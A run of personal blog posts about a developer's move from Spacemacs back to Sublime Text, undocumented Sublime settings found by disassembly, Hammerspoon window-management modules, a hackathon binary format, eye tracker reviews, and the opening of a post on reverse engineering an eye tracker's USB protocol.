Little did I know at that point that the reason it only had 20 stars was that by chance and lots of Googling I had just stumbled upon it earlier than everyone else. Over the coming weeks I continued tweaking and sending PRs and other early adopters like Diego trickled in to the chat and started contributing.

As I used Spacemacs I often noticed things that worked poorly or not at all. I kept steadily fixing most problems I found and adding new contribution layers for the things I wanted. When I was using Spacemacs for something where I had already fixed most of the bugs, it was quite nice and felt efficient.

I continued using Spacemacs for around 6 months and maintained my position as top contributor for most of that time. I helped newbies out in the Gitter chat, triaged PRs and contributed and maintained a few different layers.

I thouroughly enjoyed contributing to Spacemacs, but nearly everything I contributed was fixing a bug or annoyance I encountered while trying to get something done, often writing the elisp to fix an earlier problem.

Brokenness

These yak-shaving tasks ranged from fixing annoying keybinding conflicts that Sublime Text had built-in logic for, to getting LaTeX support to work. I even wrote a general mechanism for tabbing OSX windows to get around how bad all the Emacs tab/workspace plugins were. I definitely noticed my annoyance but I ignored it since I was having fun and I had hope that things would get better after more work.

However, after six months of making almost no progress on other projects while discovering and fixing bugs and implementing things I missed from other editors, I realized that there might not be an end. Part of the problem is that I love learning new languages and doing different kinds of projects. Other Spacemacs users might make a few fixes here and there for their primary use case, whereas I was stuck adding support for D, Racket, Nim and Rust and then fixing the bugs I exposed when changing my workflow.

I think the underlying reason is that everything in Emacs, and especially Spacemacs, is a hack. Core Emacs offers almost nothing and everything is layered on top as ad-hoc Emacs Lisp additions. Different third-party plugins and to some extent base functionality step on each others toes and make conflicting assumptions all the time. One particularly bad example I ran into is my Emacs hanging mysteriously when autocompleting on some two character suffixes. After much searching it turned out to be a known issue where if what I was completing looked like a domain name Emacs would try to ping it because of an interaction between autocompletion, file finding, and remote server support.

Lack of Consistency and Discoverability

Another problem with this pile-of-hacks design is that nothing was consistent or discoverable. Every moment I saved on common operations due to efficient keyboard shortcuts was cancelled out by a minute spent searching for how to do a less common operation that I didn’t do often enough to memorize.

An example of an occasional workflow I can do in Sublime is:

Paste my clipboard into the search box.
Search all files in a project for without regex support (useful when searching for a string with special characters that you don’t want to escape), case insensitively.
Narrow it down to a glob of certain files without re-typing my query.
Edit my query slightly to refine the results, again without re-typing it.
Replace the content of all those occurences once satisfied.

I tried to do this in Emacs once, and had to spend a ton of Googling and investigating M-x listings:

Look up how to search in project without regex (I’ve never figured out a way to do this)
Look up the shortcut for pasting into the minibuffer (I use Evil so I can’t use p like usual).
Hope that the command is Helm-based so I can edit my query, otherwise re-type everything to narrow it down.
Look up how to replace in project without regex, oops it’s an entirely different command from searching.
Re-enter everything into the new command and run it.

Navigating Multiple Files

The last major problem I had was how difficult it was to work with code spread across multiple files compared to Sublime Text.

There’s three main ways for working with files in Emacs: buffers, files and windows.

I tried using buffers but the problem is that buffer switching is slow and difficult. It only takes one keystroke to switch to the most recently opened other buffer, if you remember which that is, but switching to other buffers requires waiting for a list to show, reading it, then multiple additional keys to select the right one. Buffers also tend to proliferate like mad and these lists end up enormous taking many keys to filter to the right one. They are also nearly impossible to navigate with the mouse if I’m reading code and that’s where my hand is.

Navigating using normal find-file and helm mechanics has a similar problem: switching is just slow. It takes a lot of key strokes, and those strokes sometimes involve waiting for a list to appear that you can read.

Having your frame/screen split into a bunch of windows (Emacs reverses the meaning of window and frame from every other editor) in Spacemacs has the advantage that each window has a number on it and you can hit SPC+1 to SPC+9 to switch directly to them. This is great in that it is very fast and easy to remember, find and see where you want to go and how to get there. The problem is that you sacrifice screen real estate for every new file you work with. I normally ameliorate this with golden-ratio mode, which shrinks unfocused windows, but they still take up space.

With Sublime Text I use tabs, which are amazing. I can switch quickly and directly between files with cmd+1 to cmd+9, see all the files I’m working with at a glance, and navigate with the mouse if I want to. I can also easily rearrange tabs so that the most frequently used and important files are on lower consistent numbers that I can subitize. I can even use ZenTabs to ensure that I only ever have my 9 most recently used files open in tabs, eliminating buffer proliferation. Infrequent but useful actions like moving a file between windows and panes, and copying the file path are all obvious discoverable mouse actions. The file I’m working on always fills the full screen, unless I want to reference other code in another pane. When the file I want isn’t a tab I can open it with “Goto Anything”, which is similar in speed to narrowing to a buffer by name. When I want to navigate based on a project’s directory structure I have access to a fantastic file tree.

Yes, Emacs has plugins to add tabs but they are hacks. They’re ugly, slow, break when used with other plugins, don’t have good keyboard shortcuts, and display tons of useless buffers I don’t care about.

When I watch friends and coworkers use Vim and Emacs this is the thing I notice most. They look super efficient since they’re furiously typing things or navigating directories, but often the file they are opening is one that they looked at just a minute ago and would have taken me a single keystroke to switch to. They however have to type a bunch of characters to narrow to the buffer name. I even frequently see Vim/Emacs users opening files by navigating directories when I would have just typed a few characters into “Goto Anything”. Emacs and Vim also have ways to fuzzy search for a file in a project, but the heuristics and tools are often so bad and slow that they give up and fall back on manually finding the file. I’ve never seen a Vim or Emacs users who navigates between files as fast as I do in Sublime.

Realization

I realized that despite all my work and the work of other contributors using Emacs was still a pain and I longed for the just-works nature of Sublime Text. It didn’t help that many operations in Spacemacs had surprisingly high latency (similar to Atom) and many things were ugly (like the file tree). I said my goodbyes to the Spacemacs community and headed back to Sublime Text.

I still think Spacemacs is overall quite good though. If you’re someone who mainly codes in one language, especially a popular one, then you can get Spacemacs set up to do exactly what you want, and the huge community nowadays means that either the bugs will have been fixed or you can easily get help with the ones you encounter. I’ve listed a bunch of disadvantages, but Emacs has powerful features that Sublime doesn’t, I just didn’t like what I had to give up to get them.

Sublime Text 3: Back With Vengeance

So I switched back to Sublime Text 3, but just like after Vim, I took some of the things I enjoyed back with me. I updated my plugin and keybinding arsenal to include many of the handy things I used in Spacemacs.

One thing I really enjoyed in Emacs was Magit, so I installed GitSavvy in Sublime and found it had almost everything I liked about Magit. I even like its workflow marginally better and the Github integration is top notch.

I set up the Alfred Git Repos workflow to replicate opening projects with Projectile, and used my OSX window tabbing plugin to manage my Sublime Windows as well.

The fanciest thing I did was create my own set of keybindings that work like Vim except with the palm keys of my custom keyboard as the mode. That way it is faster to quickly do movement and editing actions in the middle of writing. It also synergizes way better with the mouse because I never am in an unexpected mode when I use it and then move back to the keyboard since they physical state of my hands is the state of the editor. I still drop into Vintageous mode for fancier editing though.

And all this took me only a few evenings to get to a point where I was happier with it than the Spacemacs setup that had taken me six months. I’ve been using this setup happily since mid-2015 with only a couple bugs which were quickly fixed, despite using the dev builds of ST3 and many plugins it’s been orders of magnitude more reliable than Emacs.

Jane Street

Then I went to work at Jane Street for an internship and ended up migrating back to Spacemacs for a little while. Jane Street has a bunch of internal Emacs tooling, and even a bunch of custom integration with Spacemacs, along with much more mature tooling for OCaml than Sublime Text.

It was mostly pretty good, but far from smooth sailing. Various internal and external Emacs plugins I used conflicted on their idea of where windows should go and took over other windows, almost actively replacing whichever window I cared about most. I encountered tons of bugs, both large and small. Many of these I ended up patching myself, either with dotfile snippets or pull requests.

Not only did I encounter over 20 different Emacs, Spacemacs and plugin bugs (some annoying me quite regularly) during my four months, but there were other problems. Jane Street’s massive code base made many plugins slow to a crawl. Synchronous autocompletion with Merlin occasionally hung Emacs. Using helm-projectile was unbearable without caching and slow even with it. Until I disabled a bunch of hooks saving files took seconds due to hg commands running slowly on the large repo.

Eventually I talked to the one guy using Sublime Text at Jane Street and got his set of plugins and settings for working on Jane Street’s OCaml with Sublime. I modied the Sublime Merlin plugin to support tooltips that showed the inferred type of an expression and clickable links to the file of definition and declaration.

I then started using Sublime Text for sprees of reading code, but not for writing it. Sublime still had far worse support for building and indenting Jane Street code. But, this way I could understand things faster by using quick fuzzy search of files, excellent tabs, smooth scrolling with the mouse, and tooltip links to navigate the codebase.

Eventually I started using Sublime for editing as well, after I improved indenting, highlighting and autocompletion slightly. I still kept Emacs open to run the source control, code review and Jenga build plugins, but I set up elisp so that it navigated to compile errors in both Sublime Text and Emacs. This offered an excellent compromise between nice plugins and a good editor that I was happy with.

Despite all the additional functionality and improvements I made to Sublime, I actually think I spent less time on getting Sublime to work than on fixing, debugging and setting up Spacemacs while I was there.

Closing Thoughts

Overall, I’m still very satisfied with Sublime Text. I think text editors could go a lot further than they are now, but so could most software. I feel very productive, I never fight my editor, and it works for any language I throw at it.

I would love it if Sublime was open source, or if there was an open source editor that was as good. However, I realize that many of the reasons I love Sublime wouldn’t be possible without it making money. The reason the creator(s) can pour so much effort and care into every detail is that Jon (and now also Will) can work on it full time for years. No other text editor has a custom cross-platform UI toolkit, a custom parallel regex engine, and incredibly fast indexing, search and editing engines.

I also realize that in some respects Sublime’s rather limited plugin API is an advantage. Unlike Emacs/Vim/Atom I rarely have to worry about plugins slowing down my experience by accidentally doing something synchronously on the entire file, since the API almost enforces asynchronous design. No plugin can break core functionality or slow startup times. Plugins are forced to work only in ways where it is difficult to conflict with each other since two plugins can’t implement hacks in the internals that interfere with each other. When Emacs plugins implement “helpful” hacks to basic functionality that conflict and break things, my approach is often to disable them since I rarely want these hacks anyway.

Sublime can also get faster and better every release because they don’t have to worry as much about piles of hacks restricting how they can change their internals. Like how Atom constantly has to deprecate old APIs whenever they restructure to improve performance.

Also, the recent dev builds have patched what I think was the number one hole in Sublime’s plugin API: tooltips and inline annotations. Now plugins can implement fancy custom tooltips with links and colours and formatting using a subset of HTML. This same HTML subset can also be used to inject “phantoms”: rich text annotations of code for things like previewing LaTeX formulae, colours, types, lints and errors. This should allow most of the useful plugins that previously were only possible in Atom/Emacs to be ported to Sublime, but since it is implemented centrally instead of a bunch of different ways it will work seamlessly and consistently.

I’m optimistic for the future of Sublime Text. I’d love to see a new editor that’s open source and as fast, nice and powerful as Sublime, but I don’t expect to since it would be a ton of work. Visual Studio Code looks pretty awesome though, if I was writing Javascript I’d consider it for the excellent tooling integration, but for less common languages it doesn’t look any better than Sublime.

I wrote this post because I often find myself justifying my use of Sublime Text to Vim and Emacs users. They often look at Sublime users as people who just haven’t put in the effort to learn a real power user’s text editor. They’re confused when they learn that I have tried Vim and Emacs extensively and still choose to use what they see as a basic newbie editor. I hope this post explains why Sublime is an excellent choice for a highly customizable power user’s text editor.

Edit: FAQ

Some responses to questions I’ve seen raised after posting this:

You just haven’t learned Vim. A real Vim user could do long distance text selection faster.

I think I know vim quite well, I’ve been using vim bindings for 5 years now across varying editors. I know almost all Vim bindings.

How about a test? Suppose my cursor is on line 198 of this file I want to copy match_pat.has_captures && cur_level.captures.is_some() on line 172. If you give me an efficient sequence of vim bindings for that movement I can tell you if I know what everything does without looking it up.

I think a more apt criticism would be that I think too slowly to use Vim. I can figure out that “26j4wy10e” does what I want, and at my normal english characters/second typing speed that is faster than doing the selection with my mouse. However, when I actually try and do that without figuring it out ahead of time I take longer to read, count and figure out the right numbers and actions, then type the individual characters (which due to muscle memory for english I’m slower at than typing english). I end up being slower than the mouse, and with a higher mental load.

You could say I just need to “git gud” and practice, but if practicing for hours a day for 5 years doesn’t get me to the point that I’m better than the mouse, I think it’s time to say that maybe it isn’t a lack of practice. More likely it’s an innate skill difference, processing speed, counting, typing coordination, or a combination of the above. I do actually use Vim bindings a lot of the time, I know them well, and I know when it is faster for me to use the mouse.

That all presumes that there exists a substantial number of people who are faster in practice at long distance text selection with vim shortcuts than I am with the mouse. I have yet to see someone where I can confidently say that is the case, and I’ve watched a reasonable number of vim users. Some are within the margin of error where I would have to do a timed race with a stopwatch, but I haven’t seen any that are clearly meaningfully faster. I guess everyone I’ve seen using vim (including many 5+ year users) could be a “vim n00b”, but that sounds a bit “no true scotsman”-like.

If you used stock Emacs without all the bloat it would be faster and stable.

Yes it would have been faster and more stable, however then I would just complain about the lack of a bunch of features from Sublime that I like, and the terrible keybindings.

I also have minor RSI issues, I’m not keen to turn them into major RSI issues by using Emacs bindings.

You can only switch directly to a few tabs, buffer switching is logarithmic time for many buffers.

Yes, but tabs are more like a cache. Like I mention, when it isn’t easy to hit the numbered shortcut to jump directly to a tab I use “Goto Anything” to narrow directly to the file, which takes the same amount of time buffer switching would.

Tabs are just an additional speedup in the case that I’m switching to one of my ~6 most recently/frequently used files. I’d say it’s the case that over 95% of my switches are to one of my tabs, but only at most 50% of my switches are to my most recently used other file, there’s gains to be had over Emacs in that extra 45% of switches that become fast.

Disassembling Sublime Text

2016-12-03T00:00:00+00:00

This afternoon I spent some time with the free trial of the Hopper Disassembler looking through the binary of Sublime Text 3. I found some interesting things and some undocumented settings.

Undocumented Settings

The most potentially useful and interesting thing I found were some undocumented settings for Sublime Text. A couple of them could even be useful to some people:

draw_shadows: A boolean that can disable the shadow effect when any line is longer that the window. I personally like effect but if you want a cleaner look or your window is only slightly wider than your text and the shadow effect kicks in early, you can use this setting.
indent_guide_options:
- solid: This as an undocumented option that makes indent guides solid instead of dashed. Add this in addition to a draw_* option.
- draw_active_single: Like draw_active but only draws the innermost indent guide your cursor is in instead of guides for every indent level down to it.
draw_debug: A boolean that if true enables a special debugging text renderer. It seems to turn sections of the document either blue or red, and within the sections it turns tokens alternating light and dark shades of those colours. Note you have to set the setting to false to turn it off, not just delete it. These change sometimes when scrolling and editing but I can’t figure out when and why.
wide_caret: This just acts like adding to caret_extra_width, probably an old setting, not useful.

There’s also the undocumented command line flags:

--multiinstance: Starts a new instance of Sublime even if one is already running.
--debug: Prints debug output to stdout, I think this is just the output that goes in the built-in console.

I discovered these settings by running strings on my Sublime Text.app/Contents/MacOS/Sublime Text binary and looking near the things I knew where config options for things that looked like config options, then trying them out.

Libraries Used

The Sublime Text release binaries don’t have symbol names stripped out, probably for debugging reasons, and for that I’m very grateful because it’s really cool. The assembly is still largely indecipherable to me, but there are some cool things I can find out.

From the function names I can also see some of the libraries used in the making of Sublime Text. Here’s a partial list:

Skia: It’s been mentioned online this is used for rendering everything
Google densehash: Faster hash map, used everywhere
Oniguruma: Fallback for fancy regexes the custom engine can’t handle
Boost
Google breakpad
CryptoPP/Crypto++ (in old versions, now replaced with libtomcrypt)
leveldb: Used to store symbol indexes I think
snappy: Fast compression, not sure what it is used for
Hunspell
YAML (apparently actually yaml-cpp)
lzma
Hunzip: Probably what is used to unzip the zipped up package format
libtomcrypt

Internal names

I can also see some general architecture and what things are named. This is just cool trivia.

sregex: The custom super fast regex engine. I think the special feature is that it can search for many different regexes on one piece of text at the same time. Because when I wrote a sublime-syntax highighter that’s what I would have wanted.
skyline: The name for Sublime’s widgets framework. The centerpiece is skyline_text_control.
px: The windowing and platform integration framework used for event handling, file management and other OS integration across Windows, Linux and OSX.
TokenStorage: The class that stores and renders highlighted tokens.

God how I wish any of these were open source. Each of these would be useful in many things other than text editors. There’s no app I know of that has its own custom-rendered UI framework that manages to be as fast and smoothly integrated with the OS as skyline and px are. The custom regex engine would be a handy library as well. I do understand that these goodies might not have existed in the first place if Jon couldn’t make money off of Sublime Text though, so I’m grateful that I at least have one beautiful and fast cross- platform app.

I also tried to figure out how some parts of the editor work and why they are so fast, but I couldn’t figure out much from the assembly. All the key functions have hundreds of basic blocks and are enormous with everything inlined. If I spent an entire day I might be able to reverse engineer one function, but that wouldn’t get me very far.

If there’s anything you’re interested in about Sublime Text’s internals, leave a comment and I might take a look. Especially if it’s a tiny behaviour improvement that isn’t accessible to the plugin API but might be possible to patch in the binary, with a debugger, or with something like Frida.

Edit: Updates

After this article was posted on Hacker News and cross-posted to the Sublime forum, @wbond, the Package Control maintainer and new Sublime developer replied with some corrections and new info. I’ve updated the library listing above with the new info.

Advanced Hackery With The Hammerspoon Window Manager

2016-07-16T00:00:00+00:00

Along with Dash, Sketch and Papers, one of the main reasons I haven’t yet switched to Linux is Hammerspoon. Hammerspoon gives me most of the power that a fancy Linux tiling window manager and configurable desktop would give me, without having to switch operating systems. It’s fully configurable with Lua, has tons of built in modules and it is simple to write your own modules. I think of it more as a general-purpose tool for modifying OSX’s user interface than just a window manager. This post explores some of the ways I’ve used Hammerspoon to greatly enhance my general OSX-using experience.

Window Hints

The first Hammerspoon module I wrote was a port of Slate’s window hints, which if you’ve ever used Vimium or Vimperator, are like link hints for windows. They allow you to switch to any window with only two keystrokes: One shortcut to bring up icons and letters for every window, and then simply hitting the key corresponding to the window you want.

The module was written mostly in a single evening as a native Lua module (originally for Mjolnir, the precursor to Hammerspoon). It didn’t take much time, and is very enjoyable to use, and because the module was added to the core Hammerspoon distribution, lots of other people can also benefit from it.

Window Tabs

The second Hammerspoon module I wrote was one that allows you to add tabs to any OSX Application. The tabs sit in the top right of the title bar and allow you to easily switch between windows of an app with keyboard shortcuts (e.g ctrl+tab number) and later by clicking. This was originally motivated by my switching to Spacemacs and it not having a good solution for working on many different projects like Vim tabs. This module allowed me to wrangle Emacs windows to more easily switch between different projects. I later repurposed it to switch between Sublime Windows for the same reason when I switched back to Sublime Text.

This module was very different to write since it was pure Lua. It uses Hammerspoon’s various powerful built-in modules including the drawing module, the app watcher module, and the window listener module.

Mouth Noises

Most recently I contributed a module for recognizing mouth noises. It is based off some low-latency high-accuracy mouth noise recognizers I wrote during my research term at the UWaterloo HCI lab. Personally I use this module to scroll pages hands-free while lying down on the couch with my laptop. Previously I had to contort my hand into a cramped position on my chest to scroll with the trackpad while lying on my back. It’s one of my zanier uses of Hammerspoon but it is nice to use nonetheless. Just goes to show the variety of user interface scripting tasks Hammerspoon can do.

Custom Window Management Hotkeys

I love being able to customize my window management shortcuts perfectly for the kind of things I normally do. I have a custom modifier key on my keyboard that is dedicated to window management I call hyper. Pressing hyper in combination with the left home row jumps directly between my most frequently used apps (Chrome, Sublime, iTerm2, Mail, Path Finder) and a pair of keys that mark a certain window and focus it, for all the other apps I use occasionally like PDF readers when writing LaTeX. Pressing hyper with the right home row moves a window between full screen, halves of the monitor, and between screens. Various other hyper shortcuts do things like toggling mouth noise recognition. I also have a hotkey I can hit when I plug in my external monitor that arranges all my apps between monitors in the way I like them instantly.

Miscellaneous Hackery

I’ve used Hammerspoon for some one-off tasks, especially when I want to bind things to global keyboard shortcuts. An example of this is a weekend project I did to make a mouse controlled by head movements detected by an accelerometer on a microphone headset. I used Hammerspoon to send serial commands to the microcontroller when I pressed a shortcut to toggle the mousing on and off.

Conclusion

I hope this has given you some ideas about how you can use Hammerspoon to make your computing experience more pleasant. Check out my Hammerspoon config to see how I configure everything and tie it all together. For more inspiration check out the amazing things asmagill does in his config. He has experimental modules for all sorts of things like drawing calendars, custom app menus, fonts and speech control.

Simple Binary Formats and Terrible Hacks

2016-04-03T00:00:00+00:00

Last weekend me and my friend Marc went to TerribleHack III and made Dayder, a neat little website for finding spurious correlations in lots of time series data sets. I did the ingestion of our initial data set of causes of death over time, as well as the JS/HTML front end. Marc made the correlation finding web server in Rust and also did the final prettying up of the CSS. I’m quite proud of how well it turned out given that it was made in 12 hours.

The coolest part of Dayder is how fast it is. All the DOM and JS Canvas rendering code is custom built for rendering hundreds of graphs in milliseconds. Marc and I also designed a custom simple binary format for storing time series data in a compact way. We called the format btsf and it is a key reason why our app can quickly send tons of time series data sets to the client as well as store them on the server in a compact way. All 6591 time series fit in less than 1 megabyte of data, allowing them all to be sent to the client for instantaneous filtering.

The following week I gave a short talk at a UWaterloo CS Club event about simple binary formats and how they can make your project faster, easier and cooler:

Now that I’ve used simple binary formats for both Rate With Science and Dayder, I’m a big fan. Although outside a hackathon context where I have time to learn libraries and where I don’t have the incentive to design new formats for fun, I think I would probably go with something established like Cap’n Proto or Thrift instead of a custom format.

Eye Tracker Reviews: Pupil Labs, Tobii, Eye Tribe, XLabs

2016-03-24T00:00:00+00:00

During my time at the UWaterloo HCI Lab I’ve had the opportunity to try out 5 different eye trackers and compare them. These eye trackers span the price range from free to $10,000+ and use a variety of different tracking methods. These trackers are also not always direct alternatives, they are often meant for very different scenarios.

Disclaimer: These are the results that I got for myself using these eye trackers. Eye tracking performance varies wildly between people so it is likely that for some of these trackers I got atypically bad or good performance. When my results don’t square with claimed performance or performance I’ve seen in videos I’ll try and note that.

Also, I have not done exact degrees accuracy tests on any of these trackers. I may however give figures in degrees, here’s what I mean when I mean by these: Whenever I test these out, the tracked point or the filtered point (if there is jitter) is with high probability within a given distance of my real gaze point. I then use trigenometry to work out the degree angle corresponding to that distance, a handy rule of thumb is that each degree corresponds to about a centimeter of distance at a typical screen-head distance ( tan(1.0*(pi/180))*60 = 1.04 ).

With that out of the way lets move on to the trackers:

Pupil Labs Headset: My favourite research eye tracker

My lab has a Pupil Labs eye tracking headset with a high speed world camera and 120hz binocular eye cameras. It’s well suited for a variety of research, and is the only eye tracker with amazing open source software.

Pros:

Good tracking: very high precision (i.e low jitter) and fairly high accuracy immediately after calibration (~1.5 degrees)
Allows free head motion because the eye tracker is fixed to your head.
Robustly tracks markers in order to map gaze onto surfaces like screens.
The open source software is amazing. Really good interface, easy to use, tons of features, and unlike every other eye tracker you can add any features you need yourself.
You don’t need a computer screen and you can do eye tracking experiments in other environments.
Good price for a research eye tracker (on the order of $1000), especially with academic discount.
Tolerates other IR devices. Since the tracking doesn’t use glints you can use other IR lights like an IR head tracker at the same time. It is the only eye tracker like this.
Fully cross platform: Windows, OSX and Linux.

Cons:

The headset can easily be jostled if you move your head too much or crinkle your face, and when that happens accuracy drops proportional to the change in position. The technique I’m researching requires head motion and I typically see accuracy of ~3 degrees after some head movements slightly move the headset.
Doesn’t fit with other glasses very well, and if it does fit the reflections make it worthless.
You have to wear something on your head. It is fine at first but after an hour or two can start to feel quite uncomfortable.
You have to recalibrate every single time you put it on, unlike some remote eye trackers.

Watch out for:

Eye cameras can’t adjust to get a good view of eyes very near the center of the face, I had a participant like this and it still worked but lost tracking at larger gaze angles.
If your ears move when your face moves, it will move the eye tracker out of calibration almost immediately. I had a participant like this.

Tobii EyeX / Steelseries Sentry: Best consumer eye tracker

The Tobii EyeX (or the identical Steelseries Sentry) is an incredible consumer eye tracker. One downside is it only works on Windows, but I’ve gotten around this by running the EyeX software in a VMWare Fusion VM and piping the data to my mac over UDP. Two caveats are that in order to switch to the mac and have tracking continue you have to lock the VM’s screen resolution. Also if the load gets too high on the VM sometimes the tracker will stop and take a couple seconds before it automatically restarts, this is only an issue in VMs and can be mostly avoided by running no other programs on the Windows VM.

Pros:

Extremely robust to head motion: your calibration will last practically forever. You can move your head around as much as you want and still maintain decent (2-3 degrees accuracy) tracking. This means you don’t have to calibrate every time you sit down, just keep your one calibration for an arbitrarily long time. The magnetic mount is extremely repeatable so it doesn’t need to be recalibrated.
Good accuracy even on large screens: Although the accuracy degrades near corners, in general the tracker gives me ~2-3 degrees of accuracy, which is quite decent.
Comes with very nice software. The SDK is nice and the software gives you a nice calibration test screen, a very pretty gaze trace, and some handy eye tracking desktop enhancements like warping your mouse cursor.

Cons:

Low precision. There is quite a bit of jitter, but it is bounded (it is almost never more than 2cm from the center of the jitter), so can be mostly eliminated by filtering.
Windows only.
You may not record gaze data. This is a developer SDK term meant to make you buy Tobii’s more expensive trackers, it is not an issue if you’re developing interaction techniques or just using the tracker.
Your head needs to be relatively low with respect to the monitor. I prefer my head to be near the top of my monitor but this is outside the non-adjustable view of the tracker from the monitor’s bottom edge. You can fix this by tilting your monitor upwards, I was lucky that my monitor had an adjustable stand.

[Edit] Tobii 4C: New best consumer eye tracker

I’ve now had a chance to use the Tobii 4C for a while and it’s fantastic. Everything I said about the EyeX above applies, with the following new notes:

All the processing is now done on the device, this means very low CPU and USB loads. It now works flawlessly in VMWare Fusion.
Accuracy is similar or maybe somewhat better. It’s the most accurate eye tracker I’ve used personally.
Tobii is now working on a macOS implementation of the Stream Engine SDK (the low level C API). I’ve tried out an alpha and it works quite well. I used it to implement FusionMouse.
I tried it out in combination with a TrackIR 5 and it didn’t interfere with the tracking much, which let me combine eye tracking and head tracking that is higher accuracy than the tracking Tobii provides on Windows. I remember having problems when I tried the TrackIR with the EyeX, so either they fixed something or my setup changed enough that it works now.

The restrictions on recording data still apply though, so it’s still difficult to legally use for research, other than research on interactive eye tracking systems.

Another tip I picked up: The adhesive on the magnetic strips for attaching the 4C/EyeX to a monitor have very strong permanent adhesive that’s difficult to remove without breaking or bending anything. If you use double-sided foam tape you can attach the strip to a monitor in a way that’s much easier to remove. The extra distance also enables it to be mounted on some laptops.

The Eye Tribe Tracker: Good but doesn’t work well for me

The Eye Tribe tracker (I have the older $100 model) is a great piece of hardware at a great price, unfortunately it barely works for me. I’ve seen it work well for other people in videos so I’m not claiming this is a common problem, just one that I invariably experience. I’ve tried it in tons of environments with different computers, positions and eyewear. After reverse engineering it I think I have identified the problem as due to extra glints on the side of my eyes when looking away from the center of my screen. I can calibrate in the center and get ~4 degrees of accuracy within a 1000 x 1000px area, but that isn’t great.

As such, I’ve restricted my Pros and cons to discussing other issues than accuracy:

Pros:

Great price, only $100.
Works on OSX. This is better than the Tobii EyeX so if you’re looking for a consumer tracker on OSX try the Eye Tribe.
A great high speed high resolution infrared camera: I reverse engineered the control codes so you can use it for other purposes like motion tracking or writing your own eye tracking algorithms. This can’t be done easily with the EyeX since it uses a much more locked down custom USB protocol.

Cons:

Tripod mount means that if you bump it, pull the cable, or bump your monitor, you’ll have to recalibrate. This is in contrast to the sentry, which mounts directly to your monitor. If you’re ambitious you could improve your own clamping mount for the eye tribe tracker or fix the tripod and monitor in place.
Limited software: The software does very little compared to Tobii’s and Pupil’s software. It is basically just a calibration and API server.

Tobii X2-30: Great but overpriced

My lab has a Tobii Pro X2-30 which in many ways is similar to the Tobii EyeX. The main hardware difference is that it uses two cameras instead of one, but I assume they are lower resolution since it only needs USB 2.0 bandwidths instead of USB 3.0. The main legal difference is that you are allowed to record the gaze data with the pro models. The main practical difference is that the X2-30 costs over 50 TIMES as much. The price is not public and I imagine they quote different prices to different people. I’m not sure if my lab signed any agreements with regards to giving away the price so I’ll just say we paid somewhere over 50x the price of an EyeX.

The pros/cons and tracking performance are very similar to the Tobii EyeX. Unless you are doing a study where you need to record gaze data, the 50x increase in price is not worth it in my opinion.

Pros:

Extremely robust to head motion: your calibration will last practically forever. You can move your head around as much as you want and still maintain decent (2-3 degrees accuracy) tracking. This means you don’t have to calibrate every time you sit down, just keep your one calibration for an arbitrarily long time. The magnetic mount is extremely repeatable so it doesn’t need to be recalibrated.
Good accuracy: Although the accuracy degrades near corners, in general the tracker gives ~2.0 degrees of accuracy when not using a chin rest, which is quite good and slightly better than the EyeX.
Comes with very nice software. The SDK is nice and the software gives you a nice calibration test screen, a very pretty gaze trace, and some handy eye tracking desktop enhancements like warping your mouse cursor.
The new Analytics SDK 3.0 allows use with OSX and Linux.

Cons:

The nice EyeX software it works with is Windows-only.
Only specified to work on relatively small monitors by modern standards (22” diagonal).
I found that sometimes the tracked gaze would jump for half a second or so to a wildly inaccurate position ~15cm away from where I was looking. This is bad because it is harder to filter out and distinguish from a saccade.
Crazy expensive. This is not unique to Tobii. Basically every eye tracker intended for research (except the Pupil) is absurdly overpriced. Many research eye trackers cost in the range of $50,000.
Your head needs to be relatively low with respect to the monitor. I prefer my head to be near the top of my monitor but this is outside the non-adjustable view of the tracker from the monitor’s bottom edge. You can fix this by tilting your monitor upwards, I was lucky that my monitor had an adjustable stand.

XLabs Gaze Chrome Plugin: Best webcam only eye tracker

The XLabs chrome plugin allows you to do eye tracking on a web page using only a webcam and no special hardware. I’ve only ever had good results when trying out their EyesDecide software, although I was also in a different environment when I tried it that way.

Pros:

Basically your only option for eye tracking without special hardware. Allows you to do things like web usability eye tracking studies with only a laptop.
Free! The SDK is currently free to use, although that may change, and you don’t have to buy hardware.
Rather decent tracking. Quite impressive for a webcam tracker, can achive 2-4 degree accuracies varying extensively by person, environment and calibration.
Fully cross platform, because it is just a Chrome plugin.

Cons:

Very long calibration process: If you want good results you need to go through a very long sequence of calibration dots, on the order of 30.
Very short lived calibration. It is not as robust to head motion as other trackers and becomes miscalibrated within a few minutes unless you are constantly calibrating with their dynamic calibration.
Very sensitive to lighting. You need bright light on your face, sitting near a window is best. If the lighting isn’t right it can sometimes barely work at all.
You can only use it within Chrome. No desktop apps.

Others

There are tons of crazy expensive research eye tracking systems that I haven’t tried for exactly that reason: they cost way too much. I’m sure some of them are quite excellent, but they cost as much of a car for hardware that certainly isn’t 1/10th that expensive to manufacture.

There’s two other sub-$1000 eye trackers I have not tried but I have read a bit about:

Gazepoint GP3

The Gazepoint GP3 is $500 and internally uses a Point Grey camera which probably has a 752x480 resolution, which is much lower than the Eye Tribe tracker. The only advantage it might have over the Eye Tribe is that it uses bright pupil tracking (so perhaps more robust) and their software might be better, but likely is not. Gazepoint’s software is also Windows only. I see no reason to consider this tracker over the cheaper and seemingly much better Tobii EyeX.

MyGaze

The MyGaze seems to be the deluxe consumer eye tracker. I haven’t bought it since it is outside my “just trying it out” budget when I already personally own 2 consumer eye trackers. However, there seems to be some glowing recommendations online from people who have tried other consumer eye trakers calling it the best of everything low cost. It is also made by engineers from SMI which is a super fancy expensive high quality research eye tracker company. There’s some recommendations and a video (that shows incredible <1 degree accuracy) on this forum thread. If you have the budget for it I recommend you try this tracker out (and then let me know how you like it).

One downside is that although the hardware only costs $500, you have to pay $900 to also get the developer SDK, unlike every other consumer eye tracker which gives away the SDK for free with the tracker.

The Eye Tribe Pro

The Eye Tribe is soon going to release a new tracker with new algorithms and supposedly better tracking on many dimensions for $200. I have no idea how good it will be or how it will compare to other low cost eye trackers.

A Reverse Engineering Adventure: Eye Tribe's USB Protocol

2016-02-02T00:00:00+00:00

Update: See bottom of the article for recent progress. I’ve managed to get a full 10-bit high def video feed and have released example code.

In 2014 I bought an Eye Tribe eye tracker hoping to work on some neat eye tracking projects. Unfortunately I’ve never been able to reach the fingertip level accuracy they claim and that I have seen in videos. I always get around +/- 5cm (2 inches) or more of jitter. Recently I’ve been working on eye tracking research again and I thought I would take a crack at debugging my accuracy issues.

There’s just one problem: The Eye Tribe’s tracking software is closed source and doesn’t have a debug view or a raw camera feed API. I’ve been wanting to try my hand at reverse engineering lately so I set myself the goal of reverse engineering the tracker’s USB protocol so that I could turn the tracker’s IR lights on and capture the IR video feed.

